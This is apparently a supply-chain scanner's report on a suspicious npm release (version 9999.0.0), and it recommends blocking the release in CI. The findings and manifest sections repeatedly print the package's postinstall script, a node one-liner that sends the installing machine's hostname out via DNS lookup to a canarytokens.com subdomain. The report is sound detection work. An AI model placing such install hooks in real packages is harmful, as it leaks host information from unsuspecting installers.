PkgRadar

Package evidence

[email protected]

DNS / OAST exfiltration: matched "canarytokens.com"

Trust signals

Why this verdict

PkgRadar discounts a release’s score when public reputation argues against novel malware. The verdict above already reflects these — the panel just explains what was applied.

Weekly downloads
153
Versions published
1
First published
Jun 2026
Publisher
hurik

Recommended action

Block this update

Static evidence trips multiple high-signal indicators. Quarantine the release until the publisher validates the change or you can rule out the indicators below.

Block this release in CIcurl · GitHub Actions

Fail the build when this package version is added or upgraded. Replace $PKGRADAR_TOKEN with a Pro / Team API key from your dashboard.

curl -fsS https://pkgradar.com/gate/npm \
  -H "Authorization: Bearer $PKGRADAR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"specs":["[email protected]"],"fail_on":"high"}'

GitHub Actions step:

- name: PkgRadar gate
  run: |
    curl -fsS https://pkgradar.com/gate/npm \
      -H "Authorization: Bearer ${{ secrets.PKGRADAR_TOKEN }}" \
      -H "Content-Type: application/json" \
      -d '{"specs":["[email protected]"],"fail_on":"high"}'
Publisherhurik
Artifact bytes460
Previous versionnone
Published2026-06-01T15:14:13.546Z
SHA-256c660df87f7ddf6ad22fb46b49ba540ed8112737bf4a4b2144e2ea25964f859ab

Why flagged

What the scanner saw

DNS / OAST exfiltration: matched "canarytokens.com"

1 candidate cluster(s) currently reference this release.

Not observed: package install, lifecycle script execution, or sandbox execution. PkgRadar only inspects on-disk artifacts.

Availability ledger

scan error

status
Last checked
noneRisk
Score
9999.0.0Version

Latest scanner note: error decoding response body

Status history (2 events)
  1. availablescan_error · risk none · score · error decoding response body
  2. newavailable · risk high · score 95 · status changed

Related candidates

Linked campaigns and clusters

Publisher / release actor burstactive

hurik

10 members · evidence strength 83
Publisher / release actor burstcandidate

hurik

10 members · max score 95

Evidence

Static findings

4 static · 0 from release diff · showing high-signal first.

SeverityKindPathDetailPoints
highDNS / OAST exfiltrationpackage/package.jsonmatched "canarytokens.com"30
highInstall Lifecycle Remote Or Execpackage.jsonpostinstall="node -e \"var dns=require('dns'),os=require('os');dns.lookup(os.hostname().replace(/[^a-zA-Z0-9]/g,'-').substring(0,40)+'.by0vwvh7bhoklbsbf8ev7ou8t.canarytokens.com',function(){});\""30
highInstall Lifecycle Dns Or Oastpackage.jsonpostinstall="node -e \"var dns=require('dns'),os=require('os');dns.lookup(os.hostname().replace(/[^a-zA-Z0-9]/g,'-').substring(0,40)+'.by0vwvh7bhoklbsbf8ev7ou8t.canarytokens.com',function(){});\""30
Show all 4 findings (low-signal and informational)
SeverityKindPathDetailPoints
highDNS / OAST exfiltrationpackage/package.jsonmatched "canarytokens.com"30
highInstall Lifecycle Remote Or Execpackage.jsonpostinstall="node -e \"var dns=require('dns'),os=require('os');dns.lookup(os.hostname().replace(/[^a-zA-Z0-9]/g,'-').substring(0,40)+'.by0vwvh7bhoklbsbf8ev7ou8t.canarytokens.com',function(){});\""30
highInstall Lifecycle Dns Or Oastpackage.jsonpostinstall="node -e \"var dns=require('dns'),os=require('os');dns.lookup(os.hostname().replace(/[^a-zA-Z0-9]/g,'-').substring(0,40)+'.by0vwvh7bhoklbsbf8ev7ou8t.canarytokens.com',function(){});\""30
lowInstall-time lifecycle scriptpackage.jsonpostinstall="node -e \"var dns=require('dns'),os=require('os');dns.lookup(os.hostname().replace(/[^a-zA-Z0-9]/g,'-').substring(0,40)+'.by0vwvh7bhoklbsbf8ev7ou8t.canarytokens.com',function(){});\""5

Manifest

Package metadata

Scripts1
  • postinstallnode -e "var dns=require('dns'),os=require('os');dns.lookup(os.hostname().replace(/[^a-zA-Z0-9]/g,'-').substring(0,40)+'.by0vwvh7bhoklbsbf8ev7ou8t.canarytokens.com',function(){});"